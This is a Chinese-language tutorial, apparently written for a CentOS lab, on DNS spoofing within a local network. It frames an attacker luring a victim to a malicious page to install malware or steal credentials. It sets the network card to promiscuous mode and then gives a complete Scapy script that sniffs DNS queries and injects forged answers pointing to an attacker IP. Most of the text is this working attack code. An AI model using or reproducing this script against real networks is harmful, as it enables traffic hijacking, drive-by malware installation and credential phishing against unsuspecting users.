假设在一个的局域网内有两个人:Bob和Eve。Eve想让Bob访问他创建的恶意网页,这样她就可以通过隐藏性的下载给Bob的计算机上安装恶意软件,或者可能展示一个欺骗性的站点来试图窃取Bob的认证信息。
(图片来自以上提供的链接)
(本测试环境,均为centos6.5系统环境)
一、设置attacker服务器的网卡模式为混杂模式,这样就可以捕获局域网内的所有数据包:
ifconfig em1 promisc
查看网卡模式:ifconfig em1
说明网卡已经是混杂模式
二、编写攻击代码:
打开dns_spoof.py脚本文件:
1 #!/usr/bin/env python 2 # -*- coding -*-:utf-8 3 4 from scapy.all import * 5 import time 6 import logging 7 8 logger = logging.getLogger('main') 9 logging.basicConfig(format='%(levelname)s:%(message)s',level=logging.DEBUG) 10 logger.setLevel(logging.DEBUG) 11 # Set the interface for scapy to use 12 conf.iface = 'br0' 13 # Set the spoofed response 14 spoofed_ip = '192.168.28.118' 15 16 def send_response(x): 17 # Get the requested domain 18 req_domain = x[DNS].qd.qname 19 logger.info('Found request for' + req_domain) 20 # First,we delete the existing lengths and checksums.. 21 # We will let Scapy re-create them 22 del(x[UDP].len) 23 del(x[UDP].chksum) 24 del(x[IP].len) 25 del(x[IP].chksum) 26 # Let`s build our response from a copy of the original packet 27 response = x.copy() 28 # we need to start by changing our response to be "from-ds" ,or from the access point. 29 response.FCfield = 2L 30 # Switch the MAC addresses 31 #response.addr1,response.addr2 = x.addr2,x.addr1 32 response.src,response.dst = x.dst,x.src 33 # Switch the IP addresses 34 response[IP].src,response[IP].dst = x[IP].dst,x[IP].src 35 # Switch the ports 36 response.sport,response.dport = x.dport,x.sport 37 # Set the DNS flags 38 response[DNS].qr = 1L 39 response[DNS].ra = 1L 40 response[DNS].ancount = 1 41 # Let`s add on the answer section 42 response[DNS].an = DNSRR( 43 rrname = req_domain, 44 type = 'A', 45 rclass = 'IN', 46 ttl = 900, 47 rdata = spoofed_ip 48 ) 49 # Now,we inject the response! 50 sendp(response) 51 logger.info('Sent response:' + req_domain + ' -> ' + spoofed_ip + '\n') 52 53 def main(): 54 logger.info('Starting to intercept [CTRL+C to stop]') 55 sniff(prn=lambda x: send_response(x),lfilter=lambda x:x.haslayer(UDP) and x.dport == 53) 56 57 if __name__ == "__main__": 58 # Make it happen! 59 main()